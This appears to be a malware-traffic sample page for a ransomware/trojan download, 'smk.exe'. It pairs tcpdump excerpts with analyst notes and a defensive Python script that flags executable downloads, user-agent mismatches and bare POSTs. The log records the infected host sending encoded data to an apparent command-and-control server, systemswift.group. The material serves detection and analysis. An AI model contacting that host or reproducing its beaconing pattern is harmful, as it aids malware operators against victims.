Text Example

smk.exe / systemswift.group traffic sample (tags: Ransomware, Malware, Trojan) - PCAP download

Download: pcap smk (9 MB), added May 30, 2019 8:49 am by admin, 13 downloads

2019-05-30 00:27:40.790210 IP 10.1.10.162.49184 > 10.1.10.224.80: Flags [P.], seq 3141076432:3141076852, ack 132281672, win 16425, length 420: HTTP: GET /smk.exe HTTP/1.1
GET /smk.exe HTTP/1.1
Accept: application/x-ms-application, image/jpeg, application/xaml+xml, image/gif, image/pjpeg, application/x-ms-xbap, */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Accept-Encoding: gzip, deflate
Host: 10.1.10.224
Connection: Keep-Alive

2019-05-30 00:27:41.270451 IP 10.1.10.224.80 > 10.1.10.162.49184: Flags [P.], seq 91981:92976, ack 420, win 237, length 995: HTTP
[995 bytes of binary payload from the smk.exe download. The only readable strings in this segment are the import directory of the executable:]
ADVAPI32.dll  KERNEL32.DLL  MSIMG32.dll  USER32.dll
RegEnumKeyA  ExitProcess  GetProcAddress  LoadLibraryA  VirtualProtect  AlphaBlend  CreateIcon

2019-05-30 00:27:41.471058 IP 10.1.10.224.80 > 10.1.10.162.49184: Flags [P.], seq 91981:92976, ack 420, win 237, length 995: HTTP
[same segment again: identical sequence range 91981:92976, i.e. a TCP retransmission of the payload above]

Note: only the segment at offset 91981 of the response is shown, so this is a fragment of the download, not the whole file. Four DLLs and a handful of functions, among them LoadLibraryA, GetProcAddress and VirtualProtect, is the import table typical of a packed or self-decrypting executable that resolves its real imports at run time; the unpacked code has to be recovered from the dropped file or from memory, not from this stream. Both smk.exe and upd.exe are fetched from 10.1.10.224, a private-range host on the same /24 as the victim, which indicates the binaries were staged on a lab server for this capture and that these URLs are not the original distribution points.
2019-05-30 00:28:45.641573 IP 10.1.10.162.49185 > 10.1.10.224.80: Flags [P.], seq 1442212575:1442212995, ack 1861255134, win 16425, length 420: HTTP: GET /upd.exe HTTP/1.1
GET /upd.exe HTTP/1.1
Accept: application/x-ms-application, image/jpeg, application/xaml+xml, image/gif, image/pjpeg, application/x-ms-xbap, */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Accept-Encoding: gzip, deflate
Host: 10.1.10.224
Connection: Keep-Alive

2019-05-30 00:31:43.342932 IP 10.1.10.162.49188 > 87.251.88.11.80: Flags [P.], seq 3366683940:3366684106, ack 1501580209, win 16425, length 166: HTTP: POST /index.php HTTP/1.1
POST /index.php HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)
Host: systemswift.group
Content-Length: 43647
Cache-Control: no-cache

2019-05-30 00:31:43.903892 IP 10.1.10.162.49188 > 87.251.88.11.80: Flags [P.], seq 42506:43813, ack 1, win 16425, length 1307: HTTP
[1307 bytes of POST body; the payload is not readable as text (encoded or encrypted) and is omitted here]

2019-05-30 00:31:44.415010 IP 87.251.88.11.80 > 10.1.10.162.49188: Flags [P.], seq 1:192, ack 43813, win 32, length 191: HTTP: HTTP/1.1 200 OK
HTTP/1.1 200 OK
Server: nginx
Date: Thu, 30 May 2019 04:31:44 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
X-Powered-By: PHP/5.6.40

Note: the check-in to systemswift.group (87.251.88.11) differs from the two downloads in ways a detection can key on. The User-Agent is a hard-coded "MSIE 6.0b; Windows NT 5.1" string, not the IE 8 / Windows 7 string the same host sent about four minutes earlier, so 10.1.10.162 presents two different browser identities within one capture. The POST carries 43,647 bytes to /index.php with no Content-Type header, and the server's ack of 43813 equals the 166-byte header segment plus the 43,647-byte body, so the whole upload was delivered before the 200 OK came back. The response body is chunked and is not shown in this dump. The Date header (04:31:44 GMT) against the capture clock (00:31:43) puts the capturing host at UTC-4.
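The observations above were made by reading the dump by hand: two executables fetched with a browser-like User-Agent, then a POST to systemswift.group with a different User-Agent and no Content-Type, plus one retransmitted segment. As an added example (not part of this sample or its author's tooling), the Python below parses a tcpdump -A text dump of this shape and makes those checks mechanically. The input is constructed from the capture text on this page with the binary payload lines removed, and the heuristics (GET for a .exe, POST without Content-Type, one client presenting more than one User-Agent, a repeated seq range) are this example's own choices, not rules the page states.

```python
import re
from collections import Counter, defaultdict
from dataclasses import dataclass, field
from typing import Dict, List, Optional, Tuple

# Constructed input: summaries and HTTP heads from the capture above, payload lines removed.
SAMPLE_DUMP = """\
2019-05-30 00:27:40.790210 IP 10.1.10.162.49184 > 10.1.10.224.80: Flags [P.], seq 3141076432:3141076852, ack 132281672, win 16425, length 420: HTTP: GET /smk.exe HTTP/1.1
GET /smk.exe HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: 10.1.10.224

2019-05-30 00:27:41.270451 IP 10.1.10.224.80 > 10.1.10.162.49184: Flags [P.], seq 91981:92976, ack 420, win 237, length 995: HTTP
2019-05-30 00:27:41.471058 IP 10.1.10.224.80 > 10.1.10.162.49184: Flags [P.], seq 91981:92976, ack 420, win 237, length 995: HTTP
2019-05-30 00:28:45.641573 IP 10.1.10.162.49185 > 10.1.10.224.80: Flags [P.], seq 1442212575:1442212995, ack 1861255134, win 16425, length 420: HTTP: GET /upd.exe HTTP/1.1
GET /upd.exe HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: 10.1.10.224

2019-05-30 00:31:43.342932 IP 10.1.10.162.49188 > 87.251.88.11.80: Flags [P.], seq 3366683940:3366684106, ack 1501580209, win 16425, length 166: HTTP: POST /index.php HTTP/1.1
POST /index.php HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)
Host: systemswift.group
Content-Length: 43647

2019-05-30 00:31:43.903892 IP 10.1.10.162.49188 > 87.251.88.11.80: Flags [P.], seq 42506:43813, ack 1, win 16425, length 1307: HTTP
2019-05-30 00:31:44.415010 IP 87.251.88.11.80 > 10.1.10.162.49188: Flags [P.], seq 1:192, ack 43813, win 32, length 191: HTTP: HTTP/1.1 200 OK
HTTP/1.1 200 OK
"""

# tcpdump -tttt summary line: timestamp, numeric endpoints, optional "seq lo:hi", payload length
SUMMARY_RE = re.compile(
    r"^\S+ \S+ IP (?P<src>[\d.]+)\.(?P<sport>\d+) > (?P<dst>[\d.]+)\.(?P<dport>\d+): "
    r"Flags \[[^\]]*\], seq (?P<lo>\d+)(?::(?P<hi>\d+))?, .*?length \d+"
)

@dataclass
class Segment:
    src: str
    sport: int
    dst: str
    dport: int
    seq: Optional[Tuple[int, int]]                 # (lo, hi) when tcpdump printed a range
    http: List[str] = field(default_factory=list)  # request/status line, then header lines

    def headers(self) -> Dict[str, str]:
        out: Dict[str, str] = {}
        for line in self.http[1:]:
            name, sep, value = line.partition(":")
            if sep:
                out[name.strip().lower()] = value.strip()
        return out

def parse_dump(text: str) -> List[Segment]:
    """One Segment per summary line; the lines up to the next blank line are its HTTP head."""
    segments: List[Segment] = []
    in_head = False
    for line in text.splitlines():
        m = SUMMARY_RE.match(line)
        if m:
            seq = (int(m["lo"]), int(m["hi"])) if m["hi"] else None
            segments.append(Segment(m["src"], int(m["sport"]), m["dst"], int(m["dport"]), seq))
            in_head = True
        elif not line.strip():
            in_head = False        # blank line ends the head; body bytes are ignored
        elif in_head:
            segments[-1].http.append(line)
    return segments

def triage(segments: List[Segment]) -> dict:
    exe_downloads, bare_posts = [], []
    agents: Dict[str, set] = defaultdict(set)
    seen: Counter = Counter()
    for s in segments:
        if s.seq:                  # same 4-tuple and seq range seen twice = retransmission
            seen[(s.src, s.sport, s.dst, s.dport) + s.seq] += 1
        parts = s.http[0].split() if s.http else []
        if len(parts) < 2 or parts[0].startswith("HTTP/"):
            continue               # no head captured, or a server response
        method, path, hdrs = parts[0], parts[1], s.headers()
        if "user-agent" in hdrs:
            agents[s.src].add(hdrs["user-agent"])
        if method == "GET" and path.lower().endswith(".exe"):
            exe_downloads.append((s.src, hdrs.get("host", s.dst), path))
        if method == "POST" and "content-type" not in hdrs:
            bare_posts.append((s.src, hdrs.get("host", s.dst), path,
                               int(hdrs.get("content-length", "0"))))
    return {
        "exe_downloads": exe_downloads,
        "posts_without_content_type": bare_posts,
        "user_agent_mismatch": {ip: sorted(v) for ip, v in agents.items() if len(v) > 1},
        "retransmissions": sorted(k for k, n in seen.items() if n > 1),
    }

def triage_sample() -> dict:
    return triage(parse_dump(SAMPLE_DUMP))

if __name__ == "__main__":
    print(triage_sample())
```

To run it against the real file, feed it the output of `tcpdump -n -tttt -A -r smk.pcap 'tcp port 80'`; `-n` matters because the regex expects numeric addresses, and `-tttt` produces the date-and-time stamps seen above. Only header lines reach the parser, so a download body never does; each finding comes back as a list of tuples, which is the shape you want before turning it into an IDS rule or a ticket.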
